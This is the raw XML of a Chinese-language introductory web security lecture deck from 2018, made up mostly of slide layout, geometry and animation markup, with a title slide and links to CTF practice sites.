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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="307" r:id="rId4"/>
    <p:sldId id="308" r:id="rId5"/>
    <p:sldId id="309" r:id="rId6"/>
    <p:sldId id="315" r:id="rId7"/>
    <p:sldId id="410" r:id="rId8"/>
    <p:sldId id="411" r:id="rId9"/>
    <p:sldId id="414" r:id="rId10"/>
    <p:sldId id="416" r:id="rId11"/>
    <p:sldId id="415" r:id="rId12"/>
    <p:sldId id="417" r:id="rId13"/>
    <p:sldId id="418" r:id="rId14"/>
    <p:sldId id="419" r:id="rId15"/>
    <p:sldId id="461" r:id="rId16"/>
    <p:sldId id="398" r:id="rId17"/>
    <p:sldId id="399" r:id="rId18"/>
    <p:sldId id="400" r:id="rId19"/>
    <p:sldId id="401" r:id="rId20"/>
    <p:sldId id="454" r:id="rId21"/>
    <p:sldId id="455" r:id="rId22"/>
    <p:sldId id="311" r:id="rId23"/>
    <p:sldId id="316" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="323" r:id="rId27"/>
    <p:sldId id="331" r:id="rId28"/>
    <p:sldId id="332" r:id="rId29"/>
    <p:sldId id="337" r:id="rId30"/>
    <p:sldId id="325" r:id="rId31"/>
    <p:sldId id="329" r:id="rId32"/>
    <p:sldId id="330" r:id="rId33"/>
    <p:sldId id="433" r:id="rId34"/>
    <p:sldId id="435" r:id="rId35"/>
    <p:sldId id="310" r:id="rId36"/>
    <p:sldId id="430" r:id="rId37"/>
    <p:sldId id="431" r:id="rId38"/>
    <p:sldId id="432" r:id="rId39"/>
    <p:sldId id="318" r:id="rId40"/>
    <p:sldId id="463" r:id="rId41"/>
    <p:sldId id="462" r:id="rId42"/>
    <p:sldId id="464" r:id="rId43"/>
    <p:sldId id="465" r:id="rId44"/>
    <p:sldId id="466" r:id="rId45"/>
    <p:sldId id="467" r:id="rId46"/>
    <p:sldId id="312" r:id="rId47"/>
    <p:sldId id="313" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="321" r:id="rId51"/>
    <p:sldId id="327" r:id="rId52"/>
    <p:sldId id="334" r:id="rId53"/>
    <p:sldId id="338" r:id="rId54"/>
    <p:sldId id="339" r:id="rId55"/>
    <p:sldId id="335" r:id="rId56"/>
    <p:sldId id="341" r:id="rId57"/>
    <p:sldId id="345" r:id="rId58"/>
    <p:sldId id="346" r:id="rId59"/>
    <p:sldId id="424" r:id="rId60"/>
    <p:sldId id="456" r:id="rId61"/>
    <p:sldId id="426" r:id="rId62"/>
    <p:sldId id="428" r:id="rId63"/>
    <p:sldId id="429" r:id="rId64"/>
    <p:sldId id="436" r:id="rId65"/>
    <p:sldId id="437" r:id="rId66"/>
    <p:sldId id="423" r:id="rId67"/>
    <p:sldId id="425" r:id="rId68"/>
    <p:sldId id="342" r:id="rId69"/>
    <p:sldId id="347" r:id="rId70"/>
    <p:sldId id="457" r:id="rId71"/>
    <p:sldId id="458" r:id="rId72"/>
    <p:sldId id="459" r:id="rId73"/>
    <p:sldId id="460" r:id="rId74"/>
    <p:sldId id="348" r:id="rId75"/>
    <p:sldId id="350" r:id="rId76"/>
    <p:sldId id="352" r:id="rId77"/>
    <p:sldId id="357" r:id="rId78"/>
    <p:sldId id="358" r:id="rId79"/>
    <p:sldId id="353" r:id="rId80"/>
    <p:sldId id="351" r:id="rId81"/>
    <p:sldId id="376" r:id="rId82"/>
    <p:sldId id="391" r:id="rId83"/>
    <p:sldId id="389" r:id="rId84"/>
    <p:sldId id="402" r:id="rId85"/>
    <p:sldId id="390" r:id="rId86"/>
    <p:sldId id="452" r:id="rId87"/>
    <p:sldId id="392" r:id="rId88"/>
    <p:sldId id="405" r:id="rId89"/>
    <p:sldId id="407" r:id="rId90"/>
    <p:sldId id="406" r:id="rId91"/>
    <p:sldId id="408" r:id="rId92"/>
    <p:sldId id="420" r:id="rId93"/>
    <p:sldId id="403" r:id="rId94"/>
    <p:sldId id="404" r:id="rId95"/>
    <p:sldId id="421" r:id="rId96"/>
    <p:sldId id="422" r:id="rId97"/>
    <p:sldId id="453" r:id="rId98"/>
    <p:sldId id="434" r:id="rId99"/>
    <p:sldId id="354" r:id="rId100"/>
    <p:sldId id="355" r:id="rId101"/>
    <p:sldId id="359" r:id="rId102"/>
    <p:sldId id="360" r:id="rId103"/>
    <p:sldId id="361" r:id="rId104"/>
    <p:sldId id="362" r:id="rId105"/>
    <p:sldId id="363" r:id="rId106"/>
    <p:sldId id="364" r:id="rId107"/>
    <p:sldId id="365" r:id="rId108"/>
    <p:sldId id="366" r:id="rId109"/>
    <p:sldId id="367" r:id="rId110"/>
    <p:sldId id="368" r:id="rId111"/>
    <p:sldId id="369" r:id="rId112"/>
    <p:sldId id="396" r:id="rId113"/>
    <p:sldId id="397" r:id="rId114"/>
    <p:sldId id="370" r:id="rId115"/>
    <p:sldId id="371" r:id="rId116"/>
    <p:sldId id="372" r:id="rId117"/>
    <p:sldId id="373" r:id="rId118"/>
    <p:sldId id="374" r:id="rId119"/>
    <p:sldId id="375"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95" r:id="rId133"/>
    <p:sldId id="279" r:id="rId1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8F061"/>
    <a:srgbClr val="A6ED5F"/>
    <a:srgbClr val="FF8B00"/>
    <a:srgbClr val="17307F"/>
    <a:srgbClr val="9249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33" autoAdjust="0"/>
    <p:restoredTop sz="94656"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="600" y="60"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>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094FD5-FDC2-4794-A17F-B9082DA849AF}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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D6041E-C945-4A8D-BF38-9809FF83DF2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6041E-C945-4A8D-BF38-9809FF83DF26}"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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3494302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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3770713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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581388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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4287175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BD6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427055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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369366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6041E-C945-4A8D-BF38-9809FF83DF26}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>133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CA4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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71525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348353" y="190501"/>
            <a:ext cx="9383475" cy="453326"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX1" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX2" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY2" fmla="*/ 450945 h 450945"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY3" fmla="*/ 450945 h 450945"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX1-3" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-5" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY2-6" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-7" fmla="*/ 50006 w 9214407"/>
              <a:gd name="connsiteY3-8" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY4-10" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 9359663"/>
              <a:gd name="connsiteY0-12" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX1-13" fmla="*/ 9359663 w 9359663"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-15" fmla="*/ 9359663 w 9359663"/>
              <a:gd name="connsiteY2-16" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-17" fmla="*/ 195262 w 9359663"/>
              <a:gd name="connsiteY3-18" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-19" fmla="*/ 0 w 9359663"/>
              <a:gd name="connsiteY4-20" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX0-21" fmla="*/ 0 w 9383475"/>
              <a:gd name="connsiteY0-22" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX1-23" fmla="*/ 9383475 w 9383475"/>
              <a:gd name="connsiteY1-24" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-25" fmla="*/ 9383475 w 9383475"/>
              <a:gd name="connsiteY2-26" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-27" fmla="*/ 219074 w 9383475"/>
              <a:gd name="connsiteY3-28" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-29" fmla="*/ 0 w 9383475"/>
              <a:gd name="connsiteY4-30" fmla="*/ 9525 h 4533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383475" h="453326">
                <a:moveTo>
                  <a:pt x="0" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9383475" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9383475" y="450945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219074" y="453326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17307F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="30000"/>
                  <a:lumOff val="7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1799" y="190500"/>
            <a:ext cx="491247" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839600" y="247012"/>
            <a:ext cx="2492990" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>单击此处添加文字标题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="12292489599910513"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9947275" y="-173355"/>
            <a:ext cx="2070100" cy="2070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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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09017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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09017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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09017AD-9BF2-4947-AD66-A8DD1465B362}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="-9638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558780" y="-149225"/>
            <a:ext cx="1536700" cy="1536700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348353" y="190501"/>
            <a:ext cx="9383475" cy="453326"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX1" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX2" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY2" fmla="*/ 450945 h 450945"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY3" fmla="*/ 450945 h 450945"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 450945"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX1-3" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-5" fmla="*/ 9214407 w 9214407"/>
              <a:gd name="connsiteY2-6" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-7" fmla="*/ 50006 w 9214407"/>
              <a:gd name="connsiteY3-8" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 9214407"/>
              <a:gd name="connsiteY4-10" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 9359663"/>
              <a:gd name="connsiteY0-12" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX1-13" fmla="*/ 9359663 w 9359663"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-15" fmla="*/ 9359663 w 9359663"/>
              <a:gd name="connsiteY2-16" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-17" fmla="*/ 195262 w 9359663"/>
              <a:gd name="connsiteY3-18" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-19" fmla="*/ 0 w 9359663"/>
              <a:gd name="connsiteY4-20" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX0-21" fmla="*/ 0 w 9383475"/>
              <a:gd name="connsiteY0-22" fmla="*/ 9525 h 453326"/>
              <a:gd name="connsiteX1-23" fmla="*/ 9383475 w 9383475"/>
              <a:gd name="connsiteY1-24" fmla="*/ 0 h 453326"/>
              <a:gd name="connsiteX2-25" fmla="*/ 9383475 w 9383475"/>
              <a:gd name="connsiteY2-26" fmla="*/ 450945 h 453326"/>
              <a:gd name="connsiteX3-27" fmla="*/ 219074 w 9383475"/>
              <a:gd name="connsiteY3-28" fmla="*/ 453326 h 453326"/>
              <a:gd name="connsiteX4-29" fmla="*/ 0 w 9383475"/>
              <a:gd name="connsiteY4-30" fmla="*/ 9525 h 4533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383475" h="453326">
                <a:moveTo>
                  <a:pt x="0" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9383475" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9383475" y="450945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219074" y="453326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17307F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="30000"/>
                  <a:lumOff val="7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1799" y="190500"/>
            <a:ext cx="491247" cy="5905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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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A4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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9017AD-9BF2-4947-AD66-A8DD1465B36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4B2848-1B92-4557-90EA-52419F4EFC68}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/8/5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017AD-9BF2-4947-AD66-A8DD1465B36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ctflearn.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.shiyanbar.com/ctf/practice" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jarvisoj.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73000"/>
          </a:blip>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8387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PA_文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3057395" y="2743952"/>
            <a:ext cx="5548891" cy="868571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="4600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="4600" b="1">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>安全（一）介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4600" b="1">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028309" y="4048711"/>
            <a:ext cx="4211409" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>汇报时间：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>月      讲师：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>黄书涵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym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1+#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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18"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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358900" y="2059615"/>
            <a:ext cx="8803640" cy="2796407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
